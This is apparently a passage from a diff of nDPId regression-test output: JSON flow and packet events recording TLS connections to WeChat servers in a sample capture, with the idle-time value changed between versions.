-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": 
